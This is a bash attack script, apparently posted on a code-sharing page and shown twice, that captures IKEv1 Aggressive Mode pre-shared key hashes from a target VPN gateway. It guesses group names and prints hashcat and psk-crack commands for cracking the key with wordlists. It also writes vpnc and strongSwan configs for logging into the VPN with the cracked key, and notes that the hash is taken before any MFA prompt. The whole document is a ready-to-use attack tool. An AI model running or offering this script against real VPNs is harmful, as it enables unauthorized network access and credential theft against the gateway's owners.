nullenc0de · January 6, 2026 18:53
diff --git a/ike_psk_capture.sh b/ike_psk_capture.sh
 #!/bin/bash
 #
 # IKE PSK Hash Capture Tool
 # Captures Pre-Shared Key hashes from IKEv1 VPNs with Aggressive Mode enabled
 #
 # Usage: ./ike_psk_capture.sh <target_ip> [group_name]
 #

 RED='\033[0;31m'
 GREEN='\033[0;92m'
 YELLOW='\033[0;93m'
 CYAN='\033[0;96m'
 NC='\033[0m' # No Color

 # Check if running as root
 if [ "$EUID" -ne 0 ]; then
    echo -e "${RED}[!] This script must be run as root${NC}"
    exit 1
 fi

 # Check for ike-scan
 if ! command -v ike-scan &> /dev/null; then
    echo -e "${RED}[!] ike-scan not found. Install with: sudo apt install ike-scan${NC}"
    exit 1
 fi

 TARGET="$1"
 GROUP="${2:-GroupVPN}"
 OUTPUT_DIR="${3:-/tmp/psk_captures}"
 TIMESTAMP=$(date +%Y%m%d_%H%M%S)

 if [ -z "$TARGET" ]; then
    echo "Usage: $0 <target_ip> [group_name] [output_dir]"
    echo ""
    echo "Examples:"
    echo "  $0 192.168.1.1"
    echo "  $0 192.168.1.1 GroupVPN"
    echo "  $0 192.168.1.1 'WAN GroupVPN' /tmp/hashes"
    exit 1
 fi

 mkdir -p "$OUTPUT_DIR"

 echo ""
 echo "╔═══════════════════════════════════════════════════════════════╗"
 echo "║           IKE PSK Hash Capture Tool                           ║"
 echo "╚═══════════════════════════════════════════════════════════════╝"
 echo ""
 echo -e "Target:     ${GREEN}$TARGET${NC}"
 echo -e "Group:      ${GREEN}$GROUP${NC}"
 echo -e "Output:     ${GREEN}$OUTPUT_DIR${NC}"
 echo ""

 # Step 1: Check if target responds to IKE
 echo "[*] Step 1: Checking IKE service..."
 MAIN_MODE=$(ike-scan -M "$TARGET" 2>&1)

 if echo "$MAIN_MODE" | grep -q "Main Mode Handshake returned"; then
    echo -e "${GREEN}[+] IKEv1 Main Mode is responding${NC}"
    
    # Extract vendor
    VENDOR=$(echo "$MAIN_MODE" | grep -oP 'VID=\S+ \(\K[^)]+' | head -1)
    if [ -n "$VENDOR" ]; then
        echo -e "    Vendor: ${YELLOW}$VENDOR${NC}"
    fi
    
    # Extract transform
    TRANSFORM=$(echo "$MAIN_MODE" | grep -oP 'SA=\(\K[^)]+')
    if [ -n "$TRANSFORM" ]; then
        echo -e "    Transform: ${YELLOW}$TRANSFORM${NC}"
    fi
 else
    echo -e "${RED}[!] Target does not respond to IKEv1${NC}"
    echo "$MAIN_MODE"
    exit 1
 fi

 # Step 2: Check IKEv2
 echo ""
 echo "[*] Step 2: Checking IKEv2..."
 IKEV2=$(ike-scan --ikev2 -M "$TARGET" 2>&1)

 if echo "$IKEV2" | grep -q "SA="; then
    echo -e "${YELLOW}[!] IKEv2 is also supported (more secure, no hash exposure)${NC}"
 else
    echo -e "${GREEN}[+] IKEv2 NOT supported - IKEv1 only (vulnerable)${NC}"
 fi

 # Step 3: Test Aggressive Mode with group
 echo ""
 echo "[*] Step 3: Testing Aggressive Mode with group '$GROUP'..."
 AGG_RESULT=$(ike-scan -M -A --id="$GROUP" "$TARGET" 2>&1)

 if echo "$AGG_RESULT" | grep -q "Aggressive Mode Handshake returned"; then
    echo -e "${GREEN}[+] Aggressive Mode accepted group: $GROUP${NC}"
 else
    echo -e "${RED}[!] Group '$GROUP' not accepted${NC}"
    echo "    Try common groups: GroupVPN, vpn, VPN, default, remote, users"
    exit 1
 fi

 # Step 4: Capture PSK hash
 echo ""
 echo "[*] Step 4: Capturing PSK hash..."

 PSK_FILE="$OUTPUT_DIR/psk_${TARGET}_${GROUP// /_}_${TIMESTAMP}"
 HASHCAT_FILE="${PSK_FILE}.hashcat"

 # Capture with -P flag
 ike-scan -M -A --id="$GROUP" -P"$PSK_FILE" "$TARGET" > /dev/null 2>&1

 if [ -f "$PSK_FILE" ]; then
    echo -e "${GREEN}[+] PSK hash captured!${NC}"
    
    # Read the hash data
    HASH_DATA=$(cat "$PSK_FILE")
    
    # Extract components for display
    HASH_R=$(echo "$HASH_DATA" | awk -F: '{print $NF}')
    
    echo -e "    Hash (SHA1): ${YELLOW}$HASH_R${NC}"
    echo -e "    Raw file: ${GREEN}$PSK_FILE${NC}"
    
    # Create hashcat-ready file (mode 5400)
    cp "$PSK_FILE" "$HASHCAT_FILE"
    echo -e "    Hashcat file: ${GREEN}$HASHCAT_FILE${NC}"
    
    # Extract VPN Identity if present
    IDIR_B=$(echo "$HASH_DATA" | awk -F: '{print $6}')
    VPN_ID=""
    if [ -n "$IDIR_B" ]; then
        if [[ "$IDIR_B" =~ ^02[0-9a-fA-F]+ ]]; then
            HEX_ID="${IDIR_B:8}"
            VPN_ID=$(echo "$HEX_ID" | xxd -r -p 2>/dev/null)
            if [ -n "$VPN_ID" ]; then
                echo -e "    VPN Identity: ${YELLOW}$VPN_ID${NC}"
            fi
        fi
    fi
    
 else
    echo -e "${RED}[!] Failed to capture PSK hash${NC}"
    exit 1
 fi

 # Step 5: Quick MFA check
 echo ""
 echo "[*] Step 5: Checking for MFA (XAUTH)..."

 XAUTH_RESULT=$(ike-scan -M --trans=5,2,1,65001 "$TARGET" 2>&1)
 MFA_DETECTED=false

 if echo "$XAUTH_RESULT" | grep -q "Main Mode Handshake returned"; then
    echo -e "${YELLOW}[!] XAUTH PSK accepted - MFA may be configured${NC}"
    echo "    Note: PSK hash is still captured BEFORE MFA prompt"
    MFA_DETECTED=true
 else
    echo -e "${GREEN}[+] XAUTH not accepted - NO MFA detected on this policy${NC}"
 fi

 # Step 6: Generate connection configs
 echo ""
 echo "═══════════════════════════════════════════════════════════════════════════"
 echo -e "${GREEN}[+] SUCCESS - Hash ready for cracking${NC}"
 echo "═══════════════════════════════════════════════════════════════════════════"
 echo ""
 echo -e "${CYAN}STEP 1: CRACK THE HASH${NC}"
 echo "─────────────────────────────────────────────────────────────────────────────"
 echo ""
 echo "  Using hashcat (GPU - fastest):"
 echo -e "    ${YELLOW}hashcat -m 5400 $HASHCAT_FILE /usr/share/wordlists/rockyou.txt${NC}"
 echo ""
 echo "  Using hashcat with rules:"
 echo -e "    ${YELLOW}hashcat -m 5400 $HASHCAT_FILE /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule${NC}"
 echo ""
 echo "  Using psk-crack (CPU):"
 echo -e "    ${YELLOW}psk-crack -d /usr/share/wordlists/rockyou.txt $PSK_FILE${NC}"
 echo ""

 # Generate vpnc config
 VPNC_CONF="$OUTPUT_DIR/vpnc_${TARGET}_${GROUP// /_}.conf"
 cat > "$VPNC_CONF" << EOF
 # VPNC Configuration for $TARGET
 # Generated by ike_psk_capture.sh
 # Replace CRACKED_PASSWORD with the actual cracked PSK

 IPSec gateway $TARGET
 IPSec ID $GROUP
 IPSec secret CRACKED_PASSWORD
 # Xauth username YOUR_USERNAME
 # Xauth password YOUR_PASSWORD
 EOF

 # Generate strongswan/ipsec config
 IPSEC_CONF="$OUTPUT_DIR/ipsec_${TARGET}_${GROUP// /_}.conf"
 cat > "$IPSEC_CONF" << EOF
 # strongSwan/IPsec Configuration for $TARGET
 # Generated by ike_psk_capture.sh
 # Replace CRACKED_PASSWORD with the actual cracked PSK

 conn walsh-vpn
    keyexchange=ikev1
    left=%defaultroute
    leftid=$GROUP
    right=$TARGET
    rightid=%any
    authby=psk
    ike=3des-sha1-modp1024!
    esp=3des-sha1!
    aggressive=yes
    auto=add
    
 # Add to /etc/ipsec.secrets:
 # $TARGET : PSK "CRACKED_PASSWORD"
 EOF

 echo -e "${CYAN}STEP 2: CONNECT TO VPN (after cracking)${NC}"
 echo "─────────────────────────────────────────────────────────────────────────────"
 echo ""
 echo -e "  ${GREEN}Option A: Using vpnc (easiest)${NC}"
 echo ""
 echo "    1. Install vpnc:"
 echo -e "       ${YELLOW}sudo apt install vpnc${NC}"
 echo ""
 echo "    2. Edit the config with cracked password:"
 echo -e "       ${YELLOW}sudo nano $VPNC_CONF${NC}"
 echo ""
 echo "    3. Connect:"
 echo -e "       ${YELLOW}sudo vpnc $VPNC_CONF${NC}"
 echo ""
 echo "    4. Disconnect:"
 echo -e "       ${YELLOW}sudo vpnc-disconnect${NC}"
 echo ""
 echo "  ─────────────────────────────────────────────────────────────────────────"
 echo ""
 echo -e "  ${GREEN}Option B: Using strongSwan/ipsec${NC}"
 echo ""
 echo "    1. Copy config:"
 echo -e "       ${YELLOW}sudo cp $IPSEC_CONF /etc/ipsec.conf${NC}"
 echo ""
 echo "    2. Add secret to /etc/ipsec.secrets:"
 echo -e "       ${YELLOW}echo '$TARGET : PSK \"CRACKED_PASSWORD\"' | sudo tee -a /etc/ipsec.secrets${NC}"
 echo ""
 echo "    3. Restart and connect:"
 echo -e "       ${YELLOW}sudo ipsec restart && sudo ipsec up walsh-vpn${NC}"
 echo ""
 echo "    4. Disconnect:"
 echo -e "       ${YELLOW}sudo ipsec down walsh-vpn${NC}"
 echo ""
 echo "  ─────────────────────────────────────────────────────────────────────────"
 echo ""
 echo -e "  ${GREEN}Option C: One-liner with ike-scan (test only)${NC}"
 echo ""
 echo "    Verify cracked password works:"
 echo -e "    ${YELLOW}sudo ike-scan -M -A --id=\"$GROUP\" --pskcrack=\"CRACKED_PASSWORD\" $TARGET${NC}"
 echo ""

 if [ "$MFA_DETECTED" = true ]; then
    echo "  ─────────────────────────────────────────────────────────────────────────"
    echo ""
    echo -e "  ${YELLOW}⚠ WARNING: MFA (XAUTH) detected!${NC}"
    echo ""
    echo "    You will need username/password for XAUTH after PSK auth."
    echo "    Edit vpnc config to add:"
    echo "      Xauth username YOUR_USERNAME"
    echo "      Xauth password YOUR_PASSWORD"
    echo ""
 fi

 echo "═══════════════════════════════════════════════════════════════════════════"
 echo ""
 echo -e "${GREEN}Generated config files:${NC}"
 echo -e "  VPNC config:      ${YELLOW}$VPNC_CONF${NC}"
 echo -e "  strongSwan config: ${YELLOW}$IPSEC_CONF${NC}"
 echo ""
 echo "[*] Done."
	#!/bin/bash
	#
	# IKE PSK Hash Capture Tool
	# Captures Pre-Shared Key hashes from IKEv1 VPNs with Aggressive Mode enabled
	#
	# Usage: ./ike_psk_capture.sh <target_ip> [group_name]
	#

	RED='\033[0;31m'
	GREEN='\033[0;92m'
	YELLOW='\033[0;93m'
	CYAN='\033[0;96m'
	NC='\033[0m' # No Color

	# Check if running as root
	if [ "$EUID" -ne 0 ]; then
	echo -e "${RED}[!] This script must be run as root${NC}"
	exit 1
	fi

	# Check for ike-scan
	if ! command -v ike-scan &> /dev/null; then
	echo -e "${RED}[!] ike-scan not found. Install with: sudo apt install ike-scan${NC}"
	exit 1
	fi

	TARGET="$1"
	GROUP="${2:-GroupVPN}"
	OUTPUT_DIR="${3:-/tmp/psk_captures}"
	TIMESTAMP=$(date +%Y%m%d_%H%M%S)

	if [ -z "$TARGET" ]; then
	echo "Usage: $0 <target_ip> [group_name] [output_dir]"
	echo ""
	echo "Examples:"
	echo " $0 192.168.1.1"
	echo " $0 192.168.1.1 GroupVPN"
	echo " $0 192.168.1.1 'WAN GroupVPN' /tmp/hashes"
	exit 1
	fi

	mkdir -p "$OUTPUT_DIR"

	echo ""
	echo "╔═══════════════════════════════════════════════════════════════╗"
	echo "║ IKE PSK Hash Capture Tool ║"
	echo "╚═══════════════════════════════════════════════════════════════╝"
	echo ""
	echo -e "Target: ${GREEN}$TARGET${NC}"
	echo -e "Group: ${GREEN}$GROUP${NC}"
	echo -e "Output: ${GREEN}$OUTPUT_DIR${NC}"
	echo ""

	# Step 1: Check if target responds to IKE
	echo "[*] Step 1: Checking IKE service..."
	MAIN_MODE=$(ike-scan -M "$TARGET" 2>&1)

	if echo "$MAIN_MODE" \| grep -q "Main Mode Handshake returned"; then
	echo -e "${GREEN}[+] IKEv1 Main Mode is responding${NC}"

	# Extract vendor
	VENDOR=$(echo "$MAIN_MODE" \| grep -oP 'VID=\S+ \(\K[^)]+' \| head -1)
	if [ -n "$VENDOR" ]; then
	echo -e " Vendor: ${YELLOW}$VENDOR${NC}"
	fi

	# Extract transform
	TRANSFORM=$(echo "$MAIN_MODE" \| grep -oP 'SA=\(\K[^)]+')
	if [ -n "$TRANSFORM" ]; then
	echo -e " Transform: ${YELLOW}$TRANSFORM${NC}"
	fi
	else
	echo -e "${RED}[!] Target does not respond to IKEv1${NC}"
	echo "$MAIN_MODE"
	exit 1
	fi

	# Step 2: Check IKEv2
	echo ""
	echo "[*] Step 2: Checking IKEv2..."
	IKEV2=$(ike-scan --ikev2 -M "$TARGET" 2>&1)

	if echo "$IKEV2" \| grep -q "SA="; then
	echo -e "${YELLOW}[!] IKEv2 is also supported (more secure, no hash exposure)${NC}"
	else
	echo -e "${GREEN}[+] IKEv2 NOT supported - IKEv1 only (vulnerable)${NC}"
	fi

	# Step 3: Test Aggressive Mode with group
	echo ""
	echo "[*] Step 3: Testing Aggressive Mode with group '$GROUP'..."
	AGG_RESULT=$(ike-scan -M -A --id="$GROUP" "$TARGET" 2>&1)

	if echo "$AGG_RESULT" \| grep -q "Aggressive Mode Handshake returned"; then
	echo -e "${GREEN}[+] Aggressive Mode accepted group: $GROUP${NC}"
	else
	echo -e "${RED}[!] Group '$GROUP' not accepted${NC}"
	echo " Try common groups: GroupVPN, vpn, VPN, default, remote, users"
	exit 1
	fi

	# Step 4: Capture PSK hash
	echo ""
	echo "[*] Step 4: Capturing PSK hash..."

	PSK_FILE="$OUTPUT_DIR/psk_${TARGET}_${GROUP// /_}_${TIMESTAMP}"
	HASHCAT_FILE="${PSK_FILE}.hashcat"

	# Capture with -P flag
	ike-scan -M -A --id="$GROUP" -P"$PSK_FILE" "$TARGET" > /dev/null 2>&1

	if [ -f "$PSK_FILE" ]; then
	echo -e "${GREEN}[+] PSK hash captured!${NC}"

	# Read the hash data
	HASH_DATA=$(cat "$PSK_FILE")

	# Extract components for display
	HASH_R=$(echo "$HASH_DATA" \| awk -F: '{print $NF}')

	echo -e " Hash (SHA1): ${YELLOW}$HASH_R${NC}"
	echo -e " Raw file: ${GREEN}$PSK_FILE${NC}"

	# Create hashcat-ready file (mode 5400)
	cp "$PSK_FILE" "$HASHCAT_FILE"
	echo -e " Hashcat file: ${GREEN}$HASHCAT_FILE${NC}"

	# Extract VPN Identity if present
	IDIR_B=$(echo "$HASH_DATA" \| awk -F: '{print $6}')
	VPN_ID=""
	if [ -n "$IDIR_B" ]; then
	if [[ "$IDIR_B" =~ ^02[0-9a-fA-F]+ ]]; then
	HEX_ID="${IDIR_B:8}"
	VPN_ID=$(echo "$HEX_ID" \| xxd -r -p 2>/dev/null)
	if [ -n "$VPN_ID" ]; then
	echo -e " VPN Identity: ${YELLOW}$VPN_ID${NC}"
	fi
	fi
	fi

	else
	echo -e "${RED}[!] Failed to capture PSK hash${NC}"
	exit 1
	fi

	# Step 5: Quick MFA check
	echo ""
	echo "[*] Step 5: Checking for MFA (XAUTH)..."

	XAUTH_RESULT=$(ike-scan -M --trans=5,2,1,65001 "$TARGET" 2>&1)
	MFA_DETECTED=false

	if echo "$XAUTH_RESULT" \| grep -q "Main Mode Handshake returned"; then
	echo -e "${YELLOW}[!] XAUTH PSK accepted - MFA may be configured${NC}"
	echo " Note: PSK hash is still captured BEFORE MFA prompt"
	MFA_DETECTED=true
	else
	echo -e "${GREEN}[+] XAUTH not accepted - NO MFA detected on this policy${NC}"
	fi

	# Step 6: Generate connection configs
	echo ""
	echo "═══════════════════════════════════════════════════════════════════════════"
	echo -e "${GREEN}[+] SUCCESS - Hash ready for cracking${NC}"
	echo "═══════════════════════════════════════════════════════════════════════════"
	echo ""
	echo -e "${CYAN}STEP 1: CRACK THE HASH${NC}"
	echo "─────────────────────────────────────────────────────────────────────────────"
	echo ""
	echo " Using hashcat (GPU - fastest):"
	echo -e " ${YELLOW}hashcat -m 5400 $HASHCAT_FILE /usr/share/wordlists/rockyou.txt${NC}"
	echo ""
	echo " Using hashcat with rules:"
	echo -e " ${YELLOW}hashcat -m 5400 $HASHCAT_FILE /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule${NC}"
	echo ""
	echo " Using psk-crack (CPU):"
	echo -e " ${YELLOW}psk-crack -d /usr/share/wordlists/rockyou.txt $PSK_FILE${NC}"
	echo ""

	# Generate vpnc config
	VPNC_CONF="$OUTPUT_DIR/vpnc_${TARGET}_${GROUP// /_}.conf"
	cat > "$VPNC_CONF" << EOF
	# VPNC Configuration for $TARGET
	# Generated by ike_psk_capture.sh
	# Replace CRACKED_PASSWORD with the actual cracked PSK

	IPSec gateway $TARGET
	IPSec ID $GROUP
	IPSec secret CRACKED_PASSWORD
	# Xauth username YOUR_USERNAME
	# Xauth password YOUR_PASSWORD
	EOF

	# Generate strongswan/ipsec config
	IPSEC_CONF="$OUTPUT_DIR/ipsec_${TARGET}_${GROUP// /_}.conf"
	cat > "$IPSEC_CONF" << EOF
	# strongSwan/IPsec Configuration for $TARGET
	# Generated by ike_psk_capture.sh
	# Replace CRACKED_PASSWORD with the actual cracked PSK

	conn walsh-vpn
	keyexchange=ikev1
	left=%defaultroute
	leftid=$GROUP
	right=$TARGET
	rightid=%any
	authby=psk
	ike=3des-sha1-modp1024!
	esp=3des-sha1!
	aggressive=yes
	auto=add

	# Add to /etc/ipsec.secrets:
	# $TARGET : PSK "CRACKED_PASSWORD"
	EOF

	echo -e "${CYAN}STEP 2: CONNECT TO VPN (after cracking)${NC}"
	echo "─────────────────────────────────────────────────────────────────────────────"
	echo ""
	echo -e " ${GREEN}Option A: Using vpnc (easiest)${NC}"
	echo ""
	echo " 1. Install vpnc:"
	echo -e " ${YELLOW}sudo apt install vpnc${NC}"
	echo ""
	echo " 2. Edit the config with cracked password:"
	echo -e " ${YELLOW}sudo nano $VPNC_CONF${NC}"
	echo ""
	echo " 3. Connect:"
	echo -e " ${YELLOW}sudo vpnc $VPNC_CONF${NC}"
	echo ""
	echo " 4. Disconnect:"
	echo -e " ${YELLOW}sudo vpnc-disconnect${NC}"
	echo ""
	echo " ─────────────────────────────────────────────────────────────────────────"
	echo ""
	echo -e " ${GREEN}Option B: Using strongSwan/ipsec${NC}"
	echo ""
	echo " 1. Copy config:"
	echo -e " ${YELLOW}sudo cp $IPSEC_CONF /etc/ipsec.conf${NC}"
	echo ""
	echo " 2. Add secret to /etc/ipsec.secrets:"
	echo -e " ${YELLOW}echo '$TARGET : PSK \"CRACKED_PASSWORD\"' \| sudo tee -a /etc/ipsec.secrets${NC}"
	echo ""
	echo " 3. Restart and connect:"
	echo -e " ${YELLOW}sudo ipsec restart && sudo ipsec up walsh-vpn${NC}"
	echo ""
	echo " 4. Disconnect:"
	echo -e " ${YELLOW}sudo ipsec down walsh-vpn${NC}"
	echo ""
	echo " ─────────────────────────────────────────────────────────────────────────"
	echo ""
	echo -e " ${GREEN}Option C: One-liner with ike-scan (test only)${NC}"
	echo ""
	echo " Verify cracked password works:"
	echo -e " ${YELLOW}sudo ike-scan -M -A --id=\"$GROUP\" --pskcrack=\"CRACKED_PASSWORD\" $TARGET${NC}"
	echo ""

	if [ "$MFA_DETECTED" = true ]; then
	echo " ─────────────────────────────────────────────────────────────────────────"
	echo ""
	echo -e " ${YELLOW}⚠ WARNING: MFA (XAUTH) detected!${NC}"
	echo ""
	echo " You will need username/password for XAUTH after PSK auth."
	echo " Edit vpnc config to add:"
	echo " Xauth username YOUR_USERNAME"
	echo " Xauth password YOUR_PASSWORD"
	echo ""
	fi

	echo "═══════════════════════════════════════════════════════════════════════════"
	echo ""
	echo -e "${GREEN}Generated config files:${NC}"
	echo -e " VPNC config: ${YELLOW}$VPNC_CONF${NC}"
	echo -e " strongSwan config: ${YELLOW}$IPSEC_CONF${NC}"
	echo ""
	echo "[*] Done."
No results found